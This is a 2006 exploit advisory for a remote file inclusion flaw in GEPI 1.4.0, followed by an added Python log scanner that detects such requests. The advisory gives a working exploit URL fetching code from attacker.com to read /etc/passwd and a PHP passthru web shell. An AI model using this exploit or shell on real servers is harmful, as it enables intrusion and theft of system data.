From: MILW0RM <submit_(at)_milw0rm.com>
Date: 31.10.2006
Subject: GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability

Package:-
gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:-
highly critical ..System Access..

vulnerable code:-
include($_GET['filename']); in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat /etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# milw0rm.com [2006-10-31]
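
One way to detect the request pattern above in web server logs, added here as an example and not part of the original advisory: it flags .php requests in which any query parameter decodes to a remote URL or PHP stream wrapper, as the filename parameter does here. The log entries, host names, /portal/login.php and the next parameter are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Wrappers that make PHP's include() load something other than a local file.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "ftps://", "php://", "data:", "expect://")

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')


def normalise(value, extra_rounds=2):
    """Undo extra layers of URL-encoding left after parse_qsl's single decode."""
    for _ in range(extra_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.strip().lower()


def find_rfi_attempts(log_lines, ignore_params=()):
    """Return (line_no, path, param, value) for parameters carrying a remote URL."""
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if not target.path.lower().endswith(".php"):
            continue
        for name, raw in parse_qsl(target.query, keep_blank_values=True):
            value = normalise(raw)
            if name not in ignore_params and value.startswith(REMOTE_SCHEMES):
                hits.append((line_no, target.path, name, value))
    return hits


# Constructed sample entries (documentation addresses, hypothetical host names and paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [31/Oct/2006:10:00:01 +0000] "GET /gepi/gestion/savebackup.php?filename=backup_2006.sql HTTP/1.1" 200 512',
    '198.51.100.7 - - [31/Oct/2006:10:02:13 +0000] "GET /gepi/gestion/savebackup.php?filename=http://remote.example/test.txt&cmd=cat%20/etc/passwd HTTP/1.1" 200 87',
    '198.51.100.7 - - [31/Oct/2006:10:02:40 +0000] "GET /gepi/gestion/savebackup.php?filename=hTTp%253A%252F%252Fremote.example%252Ftest.txt HTTP/1.1" 200 87',
    '192.0.2.10 - - [31/Oct/2006:10:05:00 +0000] "GET /portal/login.php?next=https://school.example/home HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG, ignore_params=("next",)):
        print(hit)
```

Parameters that legitimately carry URLs, such as redirect targets, go in ignore_params so they do not drown out real hits.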